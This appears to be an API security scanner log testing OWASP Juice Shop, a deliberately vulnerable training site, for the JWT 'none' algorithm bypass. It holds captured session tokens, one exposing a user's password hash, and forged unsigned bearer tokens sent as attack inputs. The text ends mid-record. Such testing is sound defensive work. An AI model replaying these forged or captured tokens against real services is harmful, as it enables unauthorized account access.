Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"document","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"navigate","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","Upgrade-Insecure-Requests":"1","sec-ch-ua-platform":"\"macOS\"","Sec-Fetch-User":"?1","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept, Accept-Encoding","Content-Length":"124","Date":"Thu, 09 Mar 2023 14:51:55 GMT","Location":"https://github.com/bkimminich/juice-shop","Content-Type":"text/html; charset=utf-8"}
<p>Found. Redirecting to <a href="https://github.com/bkimminich/juice-shop">https://github.com/bkimminich/juice-shop</a></p>
Attempted errors :
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution
------------------------------------
API: https://juiceshop.akto.io/rest/admin/application-configuration GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"49c9-x09b6mieS3DRRyUh3KjdGS72SnM\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"18889","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"application/json; charset=utf-8"}
{"config":{"server":{"port":3000,"basePath":""},"application":{"domain":"juice-sh.op","name":"OWASP Juice Shop","logo":"JuiceShop_Logo.png","favicon":"favicon_js.ico","theme":"bluegrey-lightgreen","showVersionNumber":true,"showGitHubLinks":true,"localBackupEnabled":true,"numberOfRandomFakeUsers":0,"altcoinName":"Juicycoin","privacyContactEmail":"donotreply@owasp-juice.shop","customMetricsPrefix":"juiceshop","chatBot":{"name":"Juicy","greeting":"Nice to meet you <customer-name>, I'm <bot-name>","trainingData":"botDefaultTrainingData.json","defaultResponse":"Sorry I couldn't understand what you were trying to say","avatar":"JuicyChatBot.png"},"social":{"twitterUrl":"https://twitter.com/owasp_juiceshop","facebookUrl":"https://www.facebook.com/owasp.juiceshop","slackUrl":"https://owasp.org/slack/invite","redditUrl":"https://www.reddit.com/r/owasp_juiceshop","pressKitUrl":"https://github.com/OWASP/owasp-swag/tree/master/projects/juice-shop","nftUrl":"https://opensea.io/collection/juice-shop","questionnaireUrl":null},"recyclePage":{"topProductImage":"fruit_press.jpg","bottomProductImage":"apple_pressings.jpg"},"welcomeBanner":{"showOnFirstStart":true,"title":"Welcome to OWASP Juice Shop!","message":"<p>Being a web application with a vast number of intended security vulnerabilities, the <strong>OWASP Juice Shop</strong> is supposed to be the opposite of a best practice or template application for web developers: It is an awareness, training, demonstration and exercise tool for security risks in modern web applications. The <strong>OWASP Juice Shop</strong> is an open-source project hosted by the non-profit <a href='https://owasp.org' target='_blank'>Open Web Application Security Project (OWASP)</a> and is developed and maintained by volunteers. 
Check out the link below for more information and documentation on the project.</p><h1><a href='https://owasp-juice.shop' target='_blank'>https://owasp-juice.shop</a></h1>"},"cookieConsent":{"backgroundColor":"#546e7a","textColor":"#ffffff","buttonColor":"#558b2f","buttonTextColor":"#ffffff","message":"This website uses fruit cookies to ensure you get the juiciest tracking experience.","dismissText":"Me want it!","linkText":"But me wait!","linkUrl":"https://www.youtube.com/watch?v=9PnbKL3wuH4"},"securityTxt":{"contact":"mailto:donotreply@owasp-juice.shop","encryption":"https://keybase.io/bkimminich/pgp_keys.asc?fingerprint=19c01cb7157e4645e9e2c863062a85a8cbfbdcda","acknowledgements":"/#/score-board","hiring":"/#/jobs"},"promotion":{"video":"owasp_promo.mp4","subtitles":"owasp_promo.vtt"},"easterEggPlanet":{"name":"Orangeuze","overlayMap":"orangemap2k.jpg"},"googleOauth":{"clientId":"1005568560502-6hm16lef8oh46hr2d98vf2ohlnj4nfhq.apps.googleusercontent.com","authorizedRedirects":[{"uri":"https://demo.owasp-juice.shop"},{"uri":"https://juice-shop.herokuapp.com"},{"uri":"https://preview.owasp-juice.shop"},{"uri":"https://juice-shop-staging.herokuapp.com"},{"uri":"https://juice-shop.wtf"},{"uri":"https://juiceshop.akto.io","proxy":"https://local3000.owasp-juice.shop"},{"uri":"http://127.0.0.1:3000","proxy":"https://local3000.owasp-juice.shop"},{"uri":"http://localhost:4200","proxy":"https://local4200.owasp-juice.shop"},{"uri":"http://127.0.0.1:4200","proxy":"https://local4200.owasp-juice.shop"},{"uri":"http://192.168.99.100:3000","proxy":"https://localmac.owasp-juice.shop"},{"uri":"http://192.168.99.100:4200","proxy":"https://localmac.owasp-juice.shop"},{"uri":"http://penguin.termina.linux.test:3000","proxy":"https://localchromeos.owasp-juice.shop"},{"uri":"http://penguin.termina.linux.test:4200","proxy":"https://localchromeos.owasp-juice.shop"}]}},"challenges":{"showSolvedNotifications":true,"showHints":true,"showMitigations":true,"codingChallengesEnabled":"solved","re
strictToTutorialsFirst":false,"overwriteUrlForProductTamperingChallenge":"https://owasp.slack.com","xssBonusPayload":"<iframe width=\"100%\" height=\"166\" scrolling=\"no\" frameborder=\"no\" allow=\"autoplay\" src=\"https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true\"></iframe>","safetyOverride":false,"showFeedbackButtons":true},"hackingInstructor":{"isEnabled":true,"avatarImage":"JuicyBot.png","hintPlaybackSpeed":"normal"},"products":[{"name":"Apple Juice (1000ml)","price":1.99,"deluxePrice":0.99,"limitPerUser":5,"description":"The all-time classic.","image":"apple_juice.jpg","reviews":[{"text":"One of my favorites!","author":"admin"},{"text":"Best thing ever!","author":"victim"}]},{"name":"Orange Juice (1000ml)","description":"Made from oranges hand-picked by Uncle Dittmeyer.","price":2.99,"deluxePrice":2.49,"image":"orange_juice.jpg","reviews":[{"text":"y0ur f1r3wall needs m0r3 musc13","author":"uvogin"}]},{"name":"Eggfruit Juice (500ml)","description":"Now with even more exotic flavour.","price":8.99,"image":"eggfruit_juice.jpg","reviews":[{"text":"I bought it, would buy again. 
5/7","author":"admin"}]},{"name":"Raspberry Juice (1000ml)","description":"Made from blended Raspberry Pi, water and sugar.","price":4.99,"image":"raspberry_juice.jpg"},{"name":"Lemon Juice (500ml)","description":"Sour but full of vitamins.","price":2.99,"deluxePrice":1.99,"limitPerUser":5,"image":"lemon_juice.jpg"},{"name":"Banana Juice (1000ml)","description":"Monkeys love it the most.","price":1.99,"image":"banana_juice.jpg","reviews":[{"text":"Fry liked it too.","author":"bender"}]},{"name":"OWASP Juice Shop T-Shirt","description":"Real fans wear it 24/7!","price":22.49,"limitPerUser":5,"image":"fan_shirt.jpg"},{"name":"OWASP Juice Shop CTF Girlie-Shirt","description":"For serious Capture-the-Flag heroines only!","price":22.49,"image":"fan_girlie.jpg"},{"name":"OWASP SSL Advanced Forensic Tool (O-Saft)","description":"O-Saft is an easy to use tool to show information about SSL certificate and tests the SSL connection according given list of ciphers and various SSL configurations.","price":0.01,"image":"orange_juice.jpg","urlForProductTamperingChallenge":"https://www.owasp.org/index.php/O-Saft"},{"name":"Christmas Super-Surprise-Box (2014 Edition)","description":"Contains a random selection of 10 bottles (each 500ml) of our tastiest juices and an extra fan shirt for an unbeatable price!","price":29.99,"image":"undefined.jpg","useForChristmasSpecialChallenge":true},{"name":"Rippertuer Special Juice","description":"Contains a magical collection of the rarest fruits gathered from all around the world, like Cherymoya Annona cherimola, Jabuticaba Myrciaria cauliflora, Bael Aegle marmelos... and others, at an unbelievable price! <br/><span style=\"color:red;\">This item has been made unavailable because of lack of safety standards.</span>","price":16.99,"image":"undefined.jpg","keywordsForPastebinDataLeakChallenge":["hueteroneel","eurogium edule"]},{"name":"OWASP Juice Shop Sticker (2015/2016 design)","description":"Die-cut sticker with the official 2015/2016 logo. 
By now this is a rare collectors item. <em>Out of stock!</em>","price":999.99,"image":"sticker.png","deletedDate":"2017-04-28"},{"name":"OWASP Juice Shop Iron-Ons (16pcs)","description":"Upgrade your clothes with washer safe <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">iron-ons</a> of the OWASP Juice Shop or CTF Extension logo!","price":14.99,"image":"iron-on.jpg"},{"name":"OWASP Juice Shop Magnets (16pcs)","description":"Your fridge will be even cooler with these OWASP Juice Shop or CTF Extension logo <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">magnets</a>!","price":15.99,"image":"magnets.jpg"},{"name":"OWASP Juice Shop Sticker Page","description":"Massive decoration opportunities with these OWASP Juice Shop or CTF Extension <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">sticker pages</a>! Each page has 16 stickers on it.","price":9.99,"image":"sticker_page.jpg"},{"name":"OWASP Juice Shop Sticker Single","description":"Super high-quality vinyl <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">sticker single</a> with the OWASP Juice Shop or CTF Extension logo! The ultimate laptop decal!","price":4.99,"image":"sticker_single.jpg"},{"name":"OWASP Juice Shop Temporary Tattoos (16pcs)","description":"Get one of these <a href=\"https://www.stickeryou.com/products/owasp-juice-shop/794\" target=\"_blank\">temporary tattoos</a> to proudly wear the OWASP Juice Shop or CTF Extension logo on your skin! If you tweet a photo of yourself with the tattoo, you get a couple of our stickers for free! 
Please mention <a href=\"https://twitter.com/owasp_juiceshop\" target=\"_blank\"><code>@owasp_juiceshop</code></a> in your tweet!","price":14.99,"image":"tattoo.jpg","reviews":[{"text":"I straight-up gots nuff props fo'these tattoos!","author":"rapper"}]},{"name":"OWASP Juice Shop Mug","description":"Black mug with regular logo on one side and CTF logo on the other! Your colleagues will envy you!","price":21.99,"image":"fan_mug.jpg"},{"name":"OWASP Juice Shop Hoodie","description":"Mr. Robot-style apparel. But in black. And with logo.","price":49.99,"image":"fan_hoodie.jpg"},{"name":"OWASP Juice Shop-CTF Velcro Patch","description":"4x3.5\" embroidered patch with velcro backside. The ultimate decal for every tactical bag or backpack!","price":2.92,"quantity":5,"limitPerUser":5,"image":"velcro-patch.jpg","reviews":[{"text":"This thang would look phat on Bobby's jacked fur coat!","author":"rapper"},{"text":"Looks so much better on my uniform than the boring Starfleet symbol.","author":"jim"}]},{"name":"Woodruff Syrup \"Forest Master X-Treme\"","description":"Harvested and manufactured in the Black Forest, Germany. Can cause hyperactive behavior in children. Can cause permanent green tongue when consumed undiluted.","price":6.99,"image":"woodruff_syrup.jpg"},{"name":"Green Smoothie","description":"Looks poisonous but is actually very good for your health! Made from green cabbage, spinach, kiwi and grass.","price":1.99,"image":"green_smoothie.jpg","reviews":[{"text":"Fresh out of a replicator.","author":"jim"}]},{"name":"Quince Juice (1000ml)","description":"Juice of the <em>Cydonia oblonga</em> fruit. Not exactly sweet but rich in Vitamin C.","price":4.99,"image":"quince.jpg"},{"name":"Apple Pomace","description":"Finest pressings of apples. Allergy disclaimer: Might contain traces of worms. Can be <a href=\"/#recycle\">sent back to us</a> for recycling.","price":0.89,"limitPerUser":5,"image":"apple_pressings.jpg"},{"name":"Fruit Press","description":"Fruits go in. 
Juice comes out. Pomace you can send back to us for recycling purposes.","price":89.99,"image":"fruit_press.jpg"},{"name":"OWASP Juice Shop Logo (3D-printed)","description":"This rare item was designed and handcrafted in Sweden. This is why it is so incredibly expensive despite its complete lack of purpose.","price":99.99,"image":"3d_keychain.jpg","fileForRetrieveBlueprintChallenge":"JuiceShop.stl","exifForBlueprintChallenge":["OpenSCAD"]},{"name":"Juice Shop Artwork","description":"Unique masterpiece painted with different kinds of juice on 90g/m² lined paper.","price":278.74,"quantity":0,"image":"artwork.jpg","deletedDate":"2020-12-24"},{"name":"Global OWASP WASPY Award 2017 Nomination","description":"Your chance to nominate up to three quiet pillars of the OWASP community ends 2017-06-30! <a href=\"https://www.owasp.org/index.php/WASPY_Awards_2017\">Nominate now!</a>","price":0.03,"image":"waspy.png","deletedDate":"2017-07-01"},{"name":"Strawberry Juice (500ml)","description":"Sweet & tasty!","price":3.99,"image":"strawberry_juice.jpeg"},{"name":"Carrot Juice (1000ml)","description":"As the old German saying goes: \"Carrots are good for the eyes. 
Or has anyone ever seen a rabbit with glasses?\"","price":2.99,"image":"carrot_juice.jpeg","reviews":[{"text":"0 st4rs f0r 7h3 h0rr1bl3 s3cur17y","author":"uvogin"}]},{"name":"OWASP Juice Shop Sweden Tour 2017 Sticker Sheet (Special Edition)","description":"10 sheets of Sweden-themed stickers with 15 stickers on each.","price":19.1,"image":"stickersheet_se.png","deletedDate":"2017-09-20"},{"name":"Pwning OWASP Juice Shop","description":"<em>The official Companion Guide</em> by Björn Kimminich available <a href=\"https://leanpub.com/juice-shop\">for free on LeanPub</a> and also <a href=\"https://pwning.owasp-juice.shop\">readable online</a>!","price":5.99,"image":"cover_small.jpg","reviews":[{"text":"Even more interesting than watching Interdimensional Cable!","author":"morty"}]},{"name":"Melon Bike (Comeback-Product 2018 Edition)","description":"The wheels of this bicycle are made from real water melons. You might not want to ride it up/down the curb too hard.","price":2999,"quantity":3,"limitPerUser":1,"image":"melon_bike.jpeg"},{"name":"OWASP Juice Shop Coaster (10pcs)","description":"Our 95mm circle coasters are printed in full color and made from thick, premium coaster board.","price":19.99,"quantity":0,"image":"coaster.jpg"},{"name":"OWASP Snakes and Ladders - Web Applications","description":"This amazing web application security awareness board game is <a href=\"https://steamcommunity.com/sharedfiles/filedetails/?id=1969196030\">available for Tabletop Simulator on Steam Workshop</a> now!","price":0.01,"quantity":8,"image":"snakes_ladders.jpg","reviews":[{"text":"Wait for a 10$ Steam sale of Tabletop Simulator!","author":"bjoernOwasp"}]},{"name":"OWASP Snakes and Ladders - Mobile Apps","description":"This amazing mobile app security awareness board game is <a href=\"https://steamcommunity.com/sharedfiles/filedetails/?id=1970691216\">available for Tabletop Simulator on Steam Workshop</a> 
now!","price":0.01,"quantity":0,"image":"snakes_ladders_m.jpg","reviews":[{"text":"Here yo' learn how tha fuck ta not show yo' goddamn phone on camera!","author":"rapper"}]},{"name":"OWASP Juice Shop Holographic Sticker","description":"Die-cut holographic sticker. Stand out from those 08/15-sticker-covered laptops with this shiny beacon of 80's coolness!","price":2,"quantity":0,"image":"holo_sticker.png","reviews":[{"text":"Rad, dude!","author":"rapper"},{"text":"Looks spacy on Bones' new tricorder!","author":"jim"},{"text":"Will put one on the Planet Express ship's bumper!","author":"bender"}]},{"name":"OWASP Juice Shop \"King of the Hill\" Facemask","description":"Facemask with compartment for filter from 50% cotton and 50% polyester.","price":13.49,"quantity":0,"limitPerUser":1,"image":"fan_facemask.jpg","reviews":[{"text":"K33p5 y0ur ju1cy 5plu773r 70 y0ur53lf!","author":"uvogin"},{"text":"Puny mask for puny human weaklings!","author":"bender"}]},{"name":"Juice Shop Adversary Trading Card (Common)","description":"Common rarity \"Juice Shop\" card for the <a href=\"https://docs.google.com/forms/d/e/1FAIpQLSecLEakawSQ56lBe2JOSbFwFYrKDCIN7Yd3iHFdQc5z8ApwdQ/viewform\">Adversary Trading Cards</a> CCG.","price":2.99,"deluxePrice":0.99,"deletedDate":"2020-11-30","limitPerUser":5,"image":"ccg_common.png","reviews":[{"text":"Ooooh, puny human playing Mau Mau, now?","author":"bender"}]},{"name":"Juice Shop Adversary Trading Card (Super Rare)","description":"Super rare \"Juice Shop\" card with holographic foil-coating for the <a href=\"https://docs.google.com/forms/d/e/1FAIpQLSecLEakawSQ56lBe2JOSbFwFYrKDCIN7Yd3iHFdQc5z8ApwdQ/viewform\">Adversary Trading Cards</a> CCG.","price":99.99,"deluxePrice":69.99,"deletedDate":"2020-11-30","quantity":2,"limitPerUser":1,"image":"ccg_foil.png","reviews":[{"text":"Mau Mau with bling-bling? 
Humans are so pathetic!","author":"bender"}]},{"name":"Juice Shop \"Permafrost\" 2020 Edition","description":"Exact version of <a href=\"https://github.com/juice-shop/juice-shop/releases/tag/v9.3.1-PERMAFROST\">OWASP Juice Shop that was archived on 02/02/2020</a> by the GitHub Archive Program and ultimately went into the <a href=\"https://github.blog/2020-07-16-github-archive-program-the-journey-of-the-worlds-open-source-code-to-the-arctic\">Arctic Code Vault</a> on July 8. 2020 where it will be safely stored for at least 1000 years.","price":9999.99,"quantity":1,"limitPerUser":1,"image":"permafrost.jpg","reviews":[{"text":"🧊 Let it go, let it go 🎶 Can't hold it back anymore 🎶 Let it go, let it go 🎶 Turn away and slam the door ❄️","author":"rapper"}]},{"name":"Best Juice Shop Salesman Artwork","description":"Unique digital painting depicting Stan, our most qualified and almost profitable salesman. He made a succesful carreer in selling used ships, coffins, krypts, crosses, real estate, life insurance, restaurant supplies, voodoo enhanced asbestos and courtroom souvenirs before <em>finally</em> adding his expertise to the Juice Shop marketing team.","price":5000,"quantity":1,"image":"artwork2.jpg","reviews":[{"text":"I'd stand on my head to make you a deal for this piece of art.","author":"stan"},{"text":"Just when my opinion of humans couldn't get any lower, along comes Stan...","author":"bender"}]},{"name":"OWASP Juice Shop Card (non-foil)","description":"Mythic rare <small><em>(obviously...)</em></small> card \"OWASP Juice Shop\" with three distinctly useful abilities. Alpha printing, mint condition. A true collectors piece to own!","price":1000,"quantity":3,"limitPerUser":1,"image":"card_alpha.jpg","reviews":[{"text":"DO NOT PLAY WITH THIS! 
Double-sleeve, then put it in the GitHub Arctic Vault for perfect preservation and boost of secondary market value!","author":"accountant"}]},{"name":"20th Anniversary Celebration Ticket","description":"Get your <a href=\"https://20thanniversary.owasp.org/\" target=\"_blank\">free 🎫 for OWASP 20th Anniversary Celebration</a> online conference! Hear from world renowned keynotes and special speakers, network with your peers and interact with our event sponsors. With an anticipated 10k+ attendees from around the world, you will not want to miss this live on-line event!","price":1e-20,"deletedDate":"2021-09-25","limitPerUser":1,"image":"20th.jpeg","reviews":[{"text":"I'll be there! Will you, too?","author":"bjoernOwasp"}]}],"memories":[{"image":"magn(et)ificent!-1571814229653.jpg","caption":"Magn(et)ificent!","user":"bjoernGoogle"},{"image":"my-rare-collectors-item!-[̲̅$̲̅(̲̅-͡°-͜ʖ-͡°̲̅)̲̅$̲̅]-1572603645543.jpg","caption":"My rare collectors item! [̲̅$̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅$̲̅]","user":"bjoernGoogle"},{"image":"favorite-hiking-place.png","caption":"I love going hiking here...","geoStalkingMetaSecurityQuestion":14,"geoStalkingMetaSecurityAnswer":"Daniel Boone National Forest"},{"image":"IMG_4253.jpg","caption":"My old workplace...","geoStalkingVisualSecurityQuestion":10,"geoStalkingVisualSecurityAnswer":"ITsec"}],"ctf":{"showFlagsInNotifications":false,"showCountryDetailsInNotifications":"none","countryMapping":null}}}
Attempted errors :
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution
------------------------------------
API: https://juiceshop.akto.io/rest/admin/application-version GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"14-JACOtdv7oa4TZ1UQUABVYqTiWE0\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"20","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"application/json; charset=utf-8"}
{"version":"14.5.1"}
Attempted errors :
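Error 1: Request API failed to satisfy api_selection_filters block, skipping execution (the test was not run against this endpoint, so "Vulnerable: false" above means untested, not confirmed safe)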
------------------------------------
API: https://juiceshop.akto.io/rest/basket/6 GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoidmljdGltIiwiZW1haWwiOiJ2aWN0aW1AZ21haWwuY29tIiwicGFzc3dvcmQiOiJhNjJlN2JlMGE1NjQwODFiNmE5Zjc1MzA4MjA4YzQzMyIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIzLTAzLTA5IDE0OjQ2OjI5LjI2OSArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE2NzgzNzM0MzAsImV4cCI6MTY3ODM5MTQzMH0.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.bUvn24at2rOcuht5hto8QHl7pXdanuLKQDBxqH2MWG2-mMEI8LgWm1R9HhUD209dHL93Ks52KijKJFOlF_5Z3-v47jY-Rf73wcA_Le69-n7EudWwrc_X6EGpNiqovVYm31RZQnU2Q_H-PtzpnzNIOnfE6z_p023acrke-cZkKss","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8"}
Original response: {"X-Frame-Options":"SAMEORIGIN","X-Recruiting":"/#/jobs","Access-Control-Allow-Origin":"*","ETag":"W/\"9a-7pRt+YYYtpn/FKWwZhab5poRD+E\"","X-Content-Type-Options":"nosniff","Connection":"close","Feature-Policy":"payment 'self'","Vary":"Accept-Encoding","Content-Length":"154","Date":"Thu, 09 Mar 2023 14:50:30 GMT","Content-Type":"application/json; charset=utf-8"}
{"status":"success","data":{"id":6,"coupon":null,"UserId":21,"createdAt":"2023-03-09T14:50:29.996Z","updatedAt":"2023-03-09T14:50:29.996Z","Products":[]}}
Attempted request : {url=https://juiceshop.akto.io/rest/basket/6, method=GET, type=HTTP/1.1, queryParams=null, body=, headers={"sec-fetch-mode":"cors","sec-fetch-site":"same-origin","cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","accept-language":"en-GB,en-US;q=0.9,en;q=0.8","x-akto-ignore":"0","accept":"application/json, text/plain, */*","authorization":"Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.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.","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","host":"juiceshop.akto.io","connection":"close","accept-encoding":"gzip, deflate","user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","sec-fetch-dest":"empty"}}
Attempted response: {statusCode=401.0, body={"status":"error","message":{}}, headers={"date":"Fri, 29 Sep 2023 08:58:25 GMT","access-control-allow-origin":"*","content-length":"31","x-content-type-options":"nosniff","x-recruiting":"/#/jobs","vary":"Accept-Encoding","x-frame-options":"SAMEORIGIN","content-type":"application/json; charset=utf-8","etag":"W/\"1f-Sc96etNbljMus8t9iaktsJ/FpRk\"","feature-policy":"payment 'self'"}}
------------------------------------
API: https://juiceshop.akto.io/rest/captcha/ GET
Test: NO_AUTH JWT_NONE_ALGO Vulnerable: false
Original request : {"Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.JYBu5fv--c9xic_A3yLhvcy2p5o6YjvsVSDnDJ8f5x5cFq5MBfm-Q3a9PrkzFk37QI9nkAsCHXp7lOOdI72sUjHyqZiBu3PT7XzOQmkf8G3D0QZn51oX-bzCEDKbprFoBi5a14duxQvuGhHakoK1La9x8Dgz0SQikeAEsDH6xzo","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Authorization":"Bearer 